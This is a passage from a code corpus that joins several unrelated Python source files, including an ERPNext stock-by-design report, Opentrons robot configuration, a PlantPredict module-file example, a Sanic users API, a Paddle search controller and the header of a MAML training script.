<a:logginglevel><loggingmodule>
bgp</loggingmodule> </a:logginglevel>
<interface>
</interface>
</data>
"""
tree_raw = etree.fromstring(string)
assert tree_raw.tag == '{http://www.company.com/TOOSchema/BarOS}data'
assert tree_raw[2].tag == '{http://www.company.com/TOOSchema/BarOS}logginglevel'
assert tree_raw[3].text == '\n '
tree_normalised = normalize_tree(string)
assert etree.tostring(tree_normalised).decode('utf-8') == \
'<data><snmp>foo</snmp><vr/><logginglevel><loggingmodule>bgp</loggingmodule></logginglevel><interface/></data>'
assert tree_normalised.tag == 'data'
assert tree_normalised[0].tag == 'snmp'
assert tree_normalised[1].tag == 'vr'
assert tree_normalised[2].tag == 'logginglevel'
|
StarcoderdataPython
|
1735386
|
<filename>MATH2021/matrix.py
#! /Library/Frameworks/Python.framework/Versions/3.9/bin/python3
# -*- coding: utf-8 -*-
print("Enter the vector: ")
a = [float(i) for i in input().strip().split(" ")]
b = [float(i) for i in input().strip().split(" ")]
if len(a) != len(b):
print("They are not in the same dimension")
quit()
dot_product = sum(i*j for i, j in zip(a, b))  # sum the products of matching components
print("ab:", dot_product)
cross_product = [0, 0, 0]
cross_product[0] = a[1]*b[2] - a[2]*b[1]
cross_product[1] = a[2]*b[0] - a[0]*b[2]
cross_product[2] = a[0]*b[1] - a[1]*b[0]
print("axb: ", cross_product)
|
StarcoderdataPython
|
1778446
|
<reponame>hamzaali15/mjt
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import cint, flt, getdate
def execute(filters=None):
if not filters: filters = {}
if filters.from_date > filters.to_date:
frappe.throw(_("From Date must be before To Date"))
float_precision = cint(frappe.db.get_default("float_precision")) or 3
columns = get_columns(filters)
item_map = get_item_details(filters)
iwb_map = get_item_warehouse_batch_map(filters, float_precision)
data = []
for item in sorted(iwb_map):
if item and (not filters.get("item") or filters.get("item") == item):
for wh in sorted(iwb_map[item]):
for design in sorted(iwb_map[item][wh]):
qty_dict = iwb_map[item][wh][design]
print()
design_name = frappe.db.get_value('Design' , design , 'design')
if qty_dict.opening_qty or qty_dict.in_qty or qty_dict.out_qty or qty_dict.bal_qty:
data.append([item, item_map[item]["item_name"], item_map[item]["description"], wh, design, design_name,
flt(qty_dict.opening_qty, float_precision), flt(qty_dict.in_qty, float_precision),
flt(qty_dict.out_qty, float_precision), flt(qty_dict.bal_qty, float_precision),
item_map[item]["stock_uom"]
])
lst = []
# for res in data:
# print("-----------------res",res)
# try:
# l = res
# doc = frappe.get_doc("Batch",res[4])
# if doc:
# l.append(doc.supplier if doc.supplier else " ")
# if doc.supplier:
# sn = frappe.db.get_value("Supplier", doc.supplier, "supplier_name")
# l.append(sn if sn else " ")
# else:
# l.append(" ")
# l.append(doc.quality_code if doc.quality_code else " ")
# l.append(doc.quality_name if doc.quality_name else " ")
# lst.append(l)
# except:
# pass
return columns, data
def get_columns(filters):
"""return columns based on filters"""
columns = [_("Item") + ":Link/Item:100"] + [_("Item Name") + "::150"] + [_("Description") + "::150"] + \
[_("Warehouse") + ":Link/Warehouse:100"] + [_("Design") + ":Link/Design:100"] + [_("Design Name") + "::150"] + [_("Opening Qty") + ":Float:90"] + \
[_("In Qty") + ":Float:80"] + [_("Out Qty") + ":Float:80"] + [_("Balance Qty") + ":Float:90"] + \
[_("UOM") + "::90"]
# + [_("Party Code") + ":Data:100"] + [_("Party Name") + ":Data:100"] + \
# [_("Quality Code") + ":Data:100"] + [_("Quality Name") + ":Data:100"]
return columns
def get_conditions(filters):
conditions = ""
if not filters.get("from_date"):
frappe.throw(_("'From Date' is required"))
if filters.get("to_date"):
conditions += " and posting_date <= '%s'" % filters["to_date"]
else:
frappe.throw(_("'To Date' is required"))
for field in ["item_code", "warehouse", "design_no", "company"]:
if filters.get(field):
conditions += " and {0} = {1}".format(field, frappe.db.escape(filters.get(field)))
return conditions
# get all details
def get_stock_ledger_entries(filters):
conditions = get_conditions(filters)
result = frappe.db.sql("""
select item_code, design_no, design_name, warehouse, posting_date, sum(actual_qty) as actual_qty
from `tabStock Ledger Entry`
where docstatus < 2 and design_no is not null %s
group by voucher_no, design_no, item_code, warehouse
order by item_code, warehouse""" %
conditions, as_dict=1)
return result
def get_item_warehouse_batch_map(filters, float_precision):
sle = get_stock_ledger_entries(filters)
iwb_map = {}
from_date = getdate(filters["from_date"])
to_date = getdate(filters["to_date"])
for d in sle:
iwb_map.setdefault(d.item_code, {}).setdefault(d.warehouse, {})\
.setdefault(d.design_no, frappe._dict({
"opening_qty": 0.0, "in_qty": 0.0, "out_qty": 0.0, "bal_qty": 0.0
}))
qty_dict = iwb_map[d.item_code][d.warehouse][d.design_no]
if d.posting_date < from_date:
qty_dict.opening_qty = flt(qty_dict.opening_qty, float_precision) \
+ flt(d.actual_qty, float_precision)
elif d.posting_date >= from_date and d.posting_date <= to_date:
if flt(d.actual_qty) > 0:
qty_dict.in_qty = flt(qty_dict.in_qty, float_precision) + flt(d.actual_qty, float_precision)
else:
qty_dict.out_qty = flt(qty_dict.out_qty, float_precision) \
+ abs(flt(d.actual_qty, float_precision))
qty_dict.bal_qty = flt(qty_dict.bal_qty, float_precision) + flt(d.actual_qty, float_precision)
return iwb_map
def get_item_details(filters):
item_map = {}
for d in frappe.db.sql("select name, item_name, description, stock_uom from tabItem", as_dict=1):
item_map.setdefault(d.name, d)
return item_map
|
StarcoderdataPython
|
160869
|
<reponame>mrakitin/opentrons
from copy import deepcopy
import json
import logging
import os
from dataclasses import asdict
from pathlib import Path
from typing import Any, Dict, List, Union, Optional, TypeVar, cast
from opentrons.config import CONFIG
from opentrons.hardware_control.types import BoardRevision
from .types import CurrentDict, RobotConfig, AxisDict
log = logging.getLogger(__name__)
ROBOT_CONFIG_VERSION = 4
PLUNGER_CURRENT_LOW = 0.05
PLUNGER_CURRENT_HIGH = 0.05
MOUNT_CURRENT_LOW = 0.1
MOUNT_CURRENT_HIGH = 0.8
X_CURRENT_LOW = 0.3
X_CURRENT_HIGH = 1.25
Y_CURRENT_LOW = 0.3
Y_CURRENT_HIGH = 1.25
XY_CURRENT_LOW_REFRESH = 0.7
MOUNT_CURRENT_HIGH_REFRESH = 0.5
Z_RETRACT_DISTANCE = 2
HIGH_CURRENT: CurrentDict = {
'default': {
'X': X_CURRENT_HIGH,
'Y': Y_CURRENT_HIGH,
'Z': MOUNT_CURRENT_HIGH_REFRESH,
'A': MOUNT_CURRENT_HIGH_REFRESH,
'B': PLUNGER_CURRENT_HIGH,
'C': PLUNGER_CURRENT_HIGH
},
'2.1': {
'X': X_CURRENT_HIGH,
'Y': Y_CURRENT_HIGH,
'Z': MOUNT_CURRENT_HIGH,
'A': MOUNT_CURRENT_HIGH,
'B': PLUNGER_CURRENT_HIGH,
'C': PLUNGER_CURRENT_HIGH
}
}
LOW_CURRENT: CurrentDict = {
'default': {
'X': XY_CURRENT_LOW_REFRESH,
'Y': XY_CURRENT_LOW_REFRESH,
'Z': MOUNT_CURRENT_LOW,
'A': MOUNT_CURRENT_LOW,
'B': PLUNGER_CURRENT_LOW,
'C': PLUNGER_CURRENT_LOW
},
'2.1': {
'X': X_CURRENT_LOW,
'Y': Y_CURRENT_LOW,
'Z': MOUNT_CURRENT_LOW,
'A': MOUNT_CURRENT_LOW,
'B': PLUNGER_CURRENT_LOW,
'C': PLUNGER_CURRENT_LOW
}
}
DEFAULT_CURRENT: CurrentDict = {
'default': {
'X': HIGH_CURRENT['default']['X'],
'Y': HIGH_CURRENT['default']['Y'],
'Z': HIGH_CURRENT['default']['Z'],
'A': HIGH_CURRENT['default']['A'],
'B': LOW_CURRENT['default']['B'],
'C': LOW_CURRENT['default']['C']
},
'2.1': {
'X': HIGH_CURRENT['2.1']['X'],
'Y': HIGH_CURRENT['2.1']['Y'],
'Z': HIGH_CURRENT['2.1']['Z'],
'A': HIGH_CURRENT['2.1']['A'],
'B': LOW_CURRENT['2.1']['B'],
'C': LOW_CURRENT['2.1']['C']
}
}
X_MAX_SPEED = 600
Y_MAX_SPEED = 400
Z_MAX_SPEED = 125
A_MAX_SPEED = 125
B_MAX_SPEED = 40
C_MAX_SPEED = 40
DEFAULT_MAX_SPEEDS: AxisDict = {
'X': X_MAX_SPEED,
'Y': Y_MAX_SPEED,
'Z': Z_MAX_SPEED,
'A': A_MAX_SPEED,
'B': B_MAX_SPEED,
'C': C_MAX_SPEED
}
DEFAULT_CURRENT_STRING = ' '.join(
['{}{}'.format(key, value) for key, value in DEFAULT_CURRENT.items()])
DEFAULT_DECK_CALIBRATION_V2: List[List[float]] = [
[1.00, 0.00, 0.00],
[0.00, 1.00, 0.00],
[0.00, 0.00, 1.00]]
DEFAULT_SIMULATION_CALIBRATION: List[List[float]] = [
[1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 1.0, -25.0],
[0.0, 0.0, 0.0, 1.0]
]
X_ACCELERATION = 3000
Y_ACCELERATION = 2000
Z_ACCELERATION = 1500
A_ACCELERATION = 1500
B_ACCELERATION = 200
C_ACCELERATION = 200
DEFAULT_ACCELERATION: Dict[str, float] = {
'X': X_ACCELERATION,
'Y': Y_ACCELERATION,
'Z': Z_ACCELERATION,
'A': A_ACCELERATION,
'B': B_ACCELERATION,
'C': C_ACCELERATION
}
DEFAULT_PIPETTE_CONFIGS: Dict[str, float] = {
'homePosition': 220,
'stepsPerMM': 768,
'maxTravel': 30
}
DEFAULT_GANTRY_STEPS_PER_MM: Dict[str, float] = {
'X': 80.00,
'Y': 80.00,
'Z': 400,
'A': 400
}
DEFAULT_MOUNT_OFFSET = [-34, 0, 0]
DEFAULT_PIPETTE_OFFSET = [0.0, 0.0, 0.0]
SERIAL_SPEED = 115200
DEFAULT_LOG_LEVEL = 'INFO'
def _build_hw_versioned_current_dict(
from_conf: Optional[Dict[str, Any]], default: CurrentDict) -> CurrentDict:
if not from_conf or not isinstance(from_conf, dict):
return default
# special case: if this is a valid old (i.e. not model-specific) current
# setup, migrate it.
if 'default' not in from_conf and not (set('XYZABC')-set(from_conf.keys())):
new_dct = deepcopy(default)
# Because there's no case in which a machine with a more recent revision
# than 2.1 should have a valid and edited robot config when updating
# to this code, we should default it to 2.1 to avoid breaking other
# robots
new_dct['2.1'] = cast(AxisDict, from_conf)
return new_dct
return cast(CurrentDict, from_conf)
DictType = TypeVar('DictType', bound=Dict)
def _build_dict_with_default(
from_conf: Union[DictType, str, None], default: DictType) -> DictType:
if not isinstance(from_conf, dict):
return default
else:
return cast(DictType, from_conf)
def current_for_revision(
current_dict: CurrentDict,
revision: BoardRevision) -> AxisDict:
if revision == BoardRevision.UNKNOWN:
return current_dict.get('2.1', current_dict['default'])
elif revision.real_name() in current_dict:
return current_dict[revision.real_name()] # type: ignore
else:
return current_dict['default']
def build_config(robot_settings: Dict[str, Any]) -> RobotConfig:
return RobotConfig(
name=robot_settings.get('name', '<NAME>'),
version=ROBOT_CONFIG_VERSION,
gantry_steps_per_mm=_build_dict_with_default(
robot_settings.get('steps_per_mm'), DEFAULT_GANTRY_STEPS_PER_MM),
acceleration=_build_dict_with_default(
robot_settings.get('acceleration'), DEFAULT_ACCELERATION),
serial_speed=robot_settings.get('serial_speed', SERIAL_SPEED),
default_current=_build_hw_versioned_current_dict(
robot_settings.get('default_current'), DEFAULT_CURRENT),
low_current=_build_hw_versioned_current_dict(
robot_settings.get('low_current'), LOW_CURRENT),
high_current=_build_hw_versioned_current_dict(
robot_settings.get('high_current'), HIGH_CURRENT),
default_max_speed=robot_settings.get(
'default_max_speed', DEFAULT_MAX_SPEEDS),
log_level=robot_settings.get('log_level', DEFAULT_LOG_LEVEL),
default_pipette_configs=robot_settings.get(
'default_pipette_configs', DEFAULT_PIPETTE_CONFIGS),
z_retract_distance=robot_settings.get(
'z_retract_distance', Z_RETRACT_DISTANCE),
left_mount_offset=robot_settings.get(
'left_mount_offset', DEFAULT_MOUNT_OFFSET),
)
def config_to_save(
config: RobotConfig) -> Dict[str, Any]:
return asdict(config)
def load() -> RobotConfig:
settings_file = CONFIG['robot_settings_file']
log.debug("Loading robot settings from {}".format(settings_file))
robot_settings = _load_json(settings_file) or {}
return build_config(robot_settings)
def save_robot_settings(config: RobotConfig,
rs_filename: str = None,
tag: str = None):
config_dict = config_to_save(config)
# Save everything else in a different file
filename = rs_filename or CONFIG['robot_settings_file']
if tag:
root, ext = os.path.splitext(filename)
filename = "{}-{}{}".format(root, tag, ext)
_save_json(config_dict, filename=filename)
return config_dict
def backup_configuration(config: RobotConfig, tag: str = None) -> None:
import time
if not tag:
tag = str(int(time.time() * 1000))
save_robot_settings(config, tag=tag)
def get_legacy_gantry_calibration() -> Optional[List[List[float]]]:
"""
Returns the legacy gantry calibration if it exists.
This should happen only if the new deck calibration file does not exist.
The legacy calibration should then be migrated to the new format.
"""
gantry_cal = _load_json(CONFIG['deck_calibration_file'])
if 'gantry_calibration' in gantry_cal:
return gantry_cal['gantry_calibration']
else:
return None
def clear() -> None:
_clear_file(CONFIG['robot_settings_file'])
def _clear_file(filename: Union[str, Path]) -> None:
log.debug('Deleting {}'.format(filename))
if os.path.exists(filename):
os.remove(filename)
# TODO: move to util (write a default load, save JSON function)
def _load_json(filename: Union[str, Path]) -> Dict[str, Any]:
try:
with open(filename, 'r') as file:
res = json.load(file)
except FileNotFoundError:
log.warning('{0} not found. Loading defaults'.format(filename))
res = {}
except json.decoder.JSONDecodeError:
log.warning('{0} is corrupt. Loading defaults'.format(filename))
res = {}
return res
def _save_json(data: Dict[str, Any], filename: Union[str, Path]) -> None:
try:
os.makedirs(os.path.dirname(filename), exist_ok=True)
with open(filename, 'w') as file:
json.dump(data, file, sort_keys=True, indent=4)
file.flush()
os.fsync(file.fileno())
except OSError:
log.exception('Write failed with exception:')
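# --- Usage sketch (illustrative, not part of the original module) ----------
# A minimal, hedged example of building a config from an empty settings dict:
# every field falls back to the module-level defaults defined above, and
# current_for_revision() then picks the per-revision current map. Using
# BoardRevision.UNKNOWN here is just a convenient choice for the demo.
if __name__ == '__main__':
    demo_config = build_config({})
    print(demo_config.serial_speed, demo_config.log_level,
          demo_config.z_retract_distance)
    print(current_for_revision(demo_config.default_current,
                               BoardRevision.UNKNOWN))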
|
StarcoderdataPython
|
1728126
|
<reponame>plantpredict/python-sdk
"""This file contains the code for "Generate a module file from module datasheet" in the "Example Usage" section of the
documentation located at https://plantpredict-python.readthedocs.io."""
import plantpredict
from plantpredict.enumerations import CellTechnologyTypeEnum, PVModelTypeEnum, ConstructionTypeEnum
# authenticate using API credentials
api = plantpredict.Api(
username="insert username here",
password="<PASSWORD>",
client_id="insert client_id here",
client_secret="insert client_secret here"
)
# instantiate a local Module object
module = api.module()
# assign basic module parameters from the manufacturer's datasheet or similar data source
module.cell_technology_type = CellTechnologyTypeEnum.CDTE
module.number_of_cells_in_series = 264
module.pv_model = PVModelTypeEnum.ONE_DIODE_RECOMBINATION
module.reference_temperature = 25
module.reference_irradiance = 1000
module.stc_max_power = 430.0
module.stc_short_circuit_current = 2.54
module.stc_open_circuit_voltage = 219.2
module.stc_mpp_current = 2.355
module.stc_mpp_voltage = 182.55
module.stc_power_temp_coef = -0.32
module.stc_short_circuit_current_temp_coef = 0.04
module.stc_open_circuit_voltage_temp_coef = -0.28
# generate single diode parameters using the default algorithm/assumptions
# (see https://plantpredict.com/algorithm/module-file-generator/ for more information)
module.generate_single_diode_parameters_default()
# at this point, the user could simply add the remaining required fields and save the new Module. alternatively, the
# user can tune the module's single diode parameters to achieve (close to) a desired effective irradiance
# response (EIR)/low-light performance. the first step is to define target relative efficiencies at specified
# irradiance
module.effective_irradiance_response = [
{'temperature': 25, 'irradiance': 1000, 'relative_efficiency': 1.0},
{'temperature': 25, 'irradiance': 800, 'relative_efficiency': 1.0029},
{'temperature': 25, 'irradiance': 600, 'relative_efficiency': 1.0003},
{'temperature': 25, 'irradiance': 400, 'relative_efficiency': 0.9872},
{'temperature': 25, 'irradiance': 200, 'relative_efficiency': 0.944}
]
# how a user tunes the module's performance is relatively open-ended, but a good place to start is using
# PlantPredict's "Optimize Series Resistance" algorithm (see https://plantpredict.com/algorithm/module-file-generator/
# for more information). this will automatically change the series resistance to generate an EIR closer to the target.
module.optimize_series_resistance()
# at any point the user can check the current model-calculated EIR to compare it to the target
calculated_effective_irradiance_response = module.calculate_effective_irradiance_response()
# additionally, an IV curve can be generated for the module for reference
iv_curve_at_stc = module.generate_iv_curve(num_iv_points=250)
# the initial series resistance optimization might not achieve an EIR close enough to the target. the user can modify
# any parameter, re-optimize series resistance or just recalculate dependent parameters, and check EIR repeatedly.
# this is the open-ended portion of module file generation. Important Note: after modifying parameters, if the user
# does not re-optimize series resistance, the "generate_single_diode_parameters_advanced" method must be called to
# re-calculate saturation_current_at_stc, diode_ideality_factor_at_stc, light_generated_current, and
# linear_temperature_dependence_on_gamma.
module.shunt_resistance_at_stc = 8000
module.dark_shunt_resistance = 9000
module.generate_single_diode_parameters_advanced()
new_eir = module.calculate_effective_irradiance_response()
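# A hedged sketch of one way to script the "modify, recalculate, re-check" loop
# described above, kept as a comment because the exact structure returned by
# calculate_effective_irradiance_response() is not documented in this example;
# the comparison helper, the tuning step on dark_shunt_resistance and the
# iteration count are illustrative assumptions, not a recommended procedure.
#
# def eir_close_enough(calculated_eir, target_eir):
#     """Placeholder comparison; implement it against whatever structure
#     calculate_effective_irradiance_response() actually returns."""
#     raise NotImplementedError
#
# for _ in range(10):
#     calculated_eir = module.calculate_effective_irradiance_response()
#     if eir_close_enough(calculated_eir, module.effective_irradiance_response):
#         break
#     module.dark_shunt_resistance *= 1.05  # illustrative tuning step
#     module.generate_single_diode_parameters_advanced()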
# once the user is satisfied with the module parameters and performance, assign other required fields
module.name = "Test Module"
module.model = "Test Module"
module.manufacturer = "Solar Company"
module.length = 2009
module.width = 1232
module.heat_absorption_coef_alpha_t = 0.9
module.construction_type = ConstructionTypeEnum.GLASS_GLASS
# create module in the PlantPredict database
module.create()
|
StarcoderdataPython
|
171230
|
# pylint: disable=missing-module-docstring
#
# Copyright (C) 2022 by YadavGulshan@Github, < https://github.com/YadavGulshan >.
#
# This file is part of < https://github.com/Yadavgulshan/pharmaService > project,
# and is released under the "BSD 3-Clause License Agreement".
# Please see < https://github.com/YadavGulshan/pharmaService/blob/master/LICENCE >
#
# All rights reserved.
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated
from rest_framework.decorators import permission_classes
from pharmacy.api.serializers import MedicineSerializer
from pharmacy.models import Medical, Medicine
@permission_classes([IsAuthenticated])
class DisplayNearbyMedicineSearchedByUser(APIView):
"""
This view matches medical stores to the user by pincode (used here as a proxy
for distance) and returns the medicines they stock.
"""
def post(self, request):
"""
Checks the request for the given pincode and medicine name, and returns the medicines stocked by medical stores whose pincode matches.
"""
pincode = request.data.get("pincode")
name = request.data.get("name")
medicineMedical = Medicine.objects.filter(name__contains=name)
# Now we have to check for the pincode of the medicals and then we will show the medicals
# which are near to the user
medical = []
for med in medicineMedical:
id = med.medicalId
# print("search func: ", id.name)
# print(Medical.objects.get(pincode=id.pincode))
# Look for id in medical model
# and then check for the pincode
result = Medical.objects.filter(pincode=id.pincode).filter(
pincode__contains=pincode
)
# print("result: ", result)
if result:
medical.append(med)
serializer = MedicineSerializer(medical, many=True)
return Response(serializer.data, status=200)
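# Illustrative request body (field values are assumptions): posting
# {"pincode": "440010", "name": "Paracetamol"} to the URL this view is wired to
# would return the serialized medicines whose name contains "Paracetamol" and
# whose medical store has a pincode containing "440010".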
|
StarcoderdataPython
|
20087
|
class Solution:
    def solve(self, matrix):
        from functools import lru_cache
        @lru_cache(None)
        def dp(i, j):
            if i < 0 or j < 0:
                return 0
            return max(dp(i - 1, j), dp(i, j - 1)) + matrix[i][j]
        return dp(len(matrix) - 1, len(matrix[0]) - 1)
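# --- Usage sketch (illustrative, not part of the original snippet) ----------
# The memoized recursion above computes the maximum path sum from the top-left
# to the bottom-right cell, moving only right or down. For the matrix below the
# best path is 1 -> 3 -> 4, so solve() returns 8.
if __name__ == "__main__":
    print(Solution().solve([[1, 2], [3, 4]]))  # expected output: 8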
|
StarcoderdataPython
|
3308956
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The controller used to search hyperparameters or neural architecture"""
import copy
import math
import numpy as np
import paddle.fluid as fluid
__all__ = ['EvolutionaryController', 'RLBaseController']
class EvolutionaryController(object):
"""Abstract controller for all evolutionary searching method.
"""
def update(self, tokens, reward):
"""Update the status of controller according current tokens and reward.
Args:
tokens(list<int>): A solution of searching task.
reward(list<int>): The reward of tokens.
"""
raise NotImplementedError('Abstract method.')
def reset(self, range_table, constrain_func=None):
"""Reset the controller.
Args:
range_table(list<int>): It is used to define the searching space of controller.
The tokens[i] generated by controller should be in [0, range_table[i]).
constrain_func(function): It is used to check whether tokens meet the constraint.
None means there is no constraint. Default: None.
"""
raise NotImplementedError('Abstract method.')
def next_tokens(self):
"""Generate new tokens.
Returns:
list<list>: The next searched tokens.
"""
raise NotImplementedError('Abstract method.')
class RLBaseController(object):
""" Base Controller for reforcement learning"""
def next_tokens(self, *args, **kwargs):
raise NotImplementedError('Abstract method.')
def update(self, *args, **kwargs):
raise NotImplementedError('Abstract method.')
def save_controller(self, program, output_dir):
fluid.save(program, output_dir)
def load_controller(self, program, load_dir):
fluid.load(program, load_dir)
def get_params(self, program):
var_dict = {}
for var in program.global_block().all_parameters():
var_dict[var.name] = np.array(fluid.global_scope().find_var(
var.name).get_tensor())
return var_dict
def set_params(self, program, params_dict, place):
for var in program.global_block().all_parameters():
fluid.global_scope().find_var(var.name).get_tensor().set(
params_dict[var.name], place)
|
StarcoderdataPython
|
3253571
|
from sanic import response
from sanic import Blueprint
from .helpers import auth_route, user_to_json, validate
from .errors import ApiError, Unauthorized, UnknownUser
from .schemas import USERMOD_SCHEMA
from .auth import check_password
bp = Blueprint(__name__)
@bp.route('/api/users/@me')
@auth_route
async def get_me(user, br, request):
"""Get the current user."""
return response.json(user_to_json(user))
@bp.route('/api/users/<user_id:int>')
@auth_route
async def get_user(user, br, request, user_id):
"""Get any user."""
if user.bot:
raise Unauthorized('Bots can not use this endpoint')
other = await br.get_user(user_id)
if not other:
raise UnknownUser('User not found')
return response.json(other.json)
@bp.patch('/api/users/@me')
@auth_route
async def patch_me(user, br, request):
"""Modify current user."""
payload = validate(request.json, USERMOD_SCHEMA)
result_user = dict(user)
new_username = payload.get('username')
if new_username and new_username != user['username']:
# proceed for a new discrim
new_discrim = br.generate_discrim(new_username)
await br.pool.execute("""
update users
set discriminator=$1, username=$2
where id=$3
""", new_discrim, new_username, user['id'])
result_user['discriminator'] = new_discrim
result_user['username'] = new_username
new_avatar = payload.get('avatar')
if new_avatar:
await br.pool.execute("""
update users
set avatar=$1
where id=$2
""", new_avatar, user['id'])
result_user['avatar'] = new_avatar
new_email = payload.get('email')
given_password = payload.get('password')
if new_email and new_email != user['email']:
check_password(user, given_password)
result_user['email'] = new_email
# TODO: new_password
return response.json(result_user)
@bp.route('/api/users/@me/guilds')
@auth_route
async def get_me_guilds(user, br, request):
# TODO: query string parameters
guild_list = await br.get_guilds(user.id)
return response.json([g.json for g in guild_list])
@bp.route('/api/users/@me/guilds/<guild_id:int>', methods=['DELETE'])
@auth_route
async def leave_guild(user, br, request, guild_id):
guild = await br.get_user_guild(user.id, guild_id)
if not guild:
return response.text('Guild not found', status=404)
try:
await br.pop_member(guild, user)
except br.MemberError as err:
raise ApiError(f'error removing user: {err!r}')
return response.text('', status=204)
|
StarcoderdataPython
|
3244537
|
<filename>bluespot/guest/const.py
SESSION_INIT = 1
SESSION_AUTHORIZED = 3
SESSION_EXPIRED = 4
SESSION_BAN = 5
GUESTRACK_INIT = 1 #Guesttrack creation
GUESTRACK_SESSION = 2 #guesttrack is assigned a session
GUESTRACK_NO_AUTH = 3 #guest track of no_auth site
GUESTRACK_TEMP_AUTH = 4 #guesttrack authorization started
GUESTRACK_NEW_AUTH = 5 #newly authorized guest track
GUESTRACK_SOCIAL_PREAUTH= 6 #guesttrack devices previously authorized
DEVICE_INIT = 1
DEVICE_AUTH = 2
DEVICE_SMS_AUTH = 3
DEVICE_BAN = 4
GUEST_INIT = 1
GUEST_AUTHORIZED = 2
GUEST_BANNED = 3
form_fields_dict = { 'firstname':"Firstname",'lastname':'<NAME>','email':'Email ID','phonenumber':'Phone Number'}
|
StarcoderdataPython
|
29191
|
<reponame>engcristian/Python
'''
Arithmetic progression with 50 elements.
'''
first_term = int(input('Type the first term of this A.P: '))
reason = int(input('Type the reason of this A.P: '))
last_term = first_term + (50 - 1)*reason  # A.P. formula: a_n = a_1 + (n - 1)*r, with n = 50 and r = reason (the common difference)
for c in range(first_term, last_term + reason, reason):
print(c, end=' ► ')
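# Worked example (illustrative): with first_term = 2 and reason = 3 the last
# term is 2 + (50 - 1)*3 = 149, and the loop above prints
# 2 ► 5 ► 8 ► ... ► 149 ► (50 terms in total).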
|
StarcoderdataPython
|
44751
|
"""
Usage Instructions:
10-shot sinusoid:
python main.py --datasource=sinusoid --logdir=logs/sine/ --metatrain_iterations=70000 --norm=None --update_batch_size=10
10-shot sinusoid baselines:
python main.py --datasource=sinusoid --logdir=logs/sine/ --pretrain_iterations=70000 --metatrain_iterations=0 --norm=None --update_batch_size=10 --baseline=oracle
python main.py --datasource=sinusoid --logdir=logs/sine/ --pretrain_iterations=70000 --metatrain_iterations=0 --norm=None --update_batch_size=10
5-way, 1-shot omniglot:
python main.py --datasource=omniglot --metatrain_iterations=60000 --meta_batch_size=32 --update_batch_size=1 --update_lr=0.4 --num_updates=1 --logdir=logs/omniglot5way/
20-way, 1-shot omniglot:
python main.py --datasource=omniglot --metatrain_iterations=60000 --meta_batch_size=16 --update_batch_size=1 --num_classes=20 --update_lr=0.1 --num_updates=5 --logdir=logs/omniglot20way/
5-way 1-shot mini imagenet:
python main.py --datasource=miniimagenet --metatrain_iterations=60000 --meta_batch_size=4 --update_batch_size=1 --update_lr=0.01 --num_updates=5 --num_classes=5 --logdir=logs/miniimagenet1shot/ --num_filters=32 --max_pool=True
5-way 5-shot mini imagenet:
python main.py --datasource=miniimagenet --metatrain_iterations=60000 --meta_batch_size=4 --update_batch_size=5 --update_lr=0.01 --num_updates=5 --num_classes=5 --logdir=logs/miniimagenet5shot/ --num_filters=32 --max_pool=True
To run evaluation, use the '--train=False' flag and the '--test_set=True' flag to use the test set.
For omniglot and miniimagenet training, acquire the dataset online, put it in the corresponding data directory, and see the python script instructions in that directory to preprocess the data.
Note that better sinusoid results can be achieved by using a larger network.
"""
import csv
import numpy as np
import pickle
import random
import tensorflow as tf
import matplotlib.pyplot as plt
from data_generator import DataGenerator
from maml import MAML
from tensorflow.python.platform import flags
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
FLAGS = flags.FLAGS
## Dataset/method options
flags.DEFINE_string('datasource', 'sinusoid', 'sinusoid or omniglot or miniimagenet')
flags.DEFINE_integer('num_classes', 5, 'number of classes used in classification (e.g. 5-way classification).')
# oracle means task id is input (only suitable for sinusoid)
# flags.DEFINE_string('baseline', "oracle", 'oracle, or None')
flags.DEFINE_string('baseline', None, 'oracle, or None')
## Training options
flags.DEFINE_integer('pretrain_iterations', 0, 'number of pre-training iterations.')
flags.DEFINE_integer('metatrain_iterations', 15000, 'number of metatraining iterations.') # 15k for omniglot, 50k for sinusoid
flags.DEFINE_integer('meta_batch_size', 25, 'number of tasks sampled per meta-update')
flags.DEFINE_float('meta_lr', 0.001, 'the base learning rate of the generator')
flags.DEFINE_integer('update_batch_size', 5, 'number of examples used for inner gradient update (K for K-shot learning).')
flags.DEFINE_float('update_lr', 1e-3, 'step size alpha for inner gradient update.') # 0.1 for omniglot
# flags.DEFINE_float('update_lr', 1e-2, 'step size alpha for inner gradient update.') # 0.1 for omniglot
flags.DEFINE_integer('num_updates', 1, 'number of inner gradient updates during training.')
## Model options
flags.DEFINE_string('norm', 'batch_norm', 'batch_norm, layer_norm, or None')
flags.DEFINE_integer('num_filters', 64, 'number of filters for conv nets -- 32 for miniimagenet, 64 for omniglot.')
flags.DEFINE_bool('conv', True, 'whether or not to use a convolutional network, only applicable in some cases')
flags.DEFINE_bool('max_pool', False, 'Whether or not to use max pooling rather than strided convolutions')
flags.DEFINE_bool('stop_grad', False, 'if True, do not use second derivatives in meta-optimization (for speed)')
flags.DEFINE_float('keep_prob', 0.5, 'if not None, used as keep_prob for all layers')
flags.DEFINE_bool('drop_connect', True, 'if True, use dropconnect, otherwise, use dropout')
# flags.DEFINE_float('keep_prob', None, 'if not None, used as keep_prob for all layers')
## Logging, saving, and testing options
flags.DEFINE_bool('log', True, 'if false, do not log summaries, for debugging code.')
flags.DEFINE_string('logdir', '/tmp/data', 'directory for summaries and checkpoints.')
flags.DEFINE_bool('resume', False, 'resume training if there is a model available')
flags.DEFINE_bool('train', True, 'True to train, False to test.')
flags.DEFINE_integer('test_iter', -1, 'iteration to load model (-1 for latest model)')
flags.DEFINE_bool('test_set', False, 'Set to true to test on the test set, False for the validation set.')
flags.DEFINE_integer('train_update_batch_size', -1, 'number of examples used for gradient update during training (use if you want to test with a different number).')
flags.DEFINE_float('train_update_lr', -1, 'value of inner gradient step size during training. (use if you want to test with a different value)') # 0.1 for omniglot
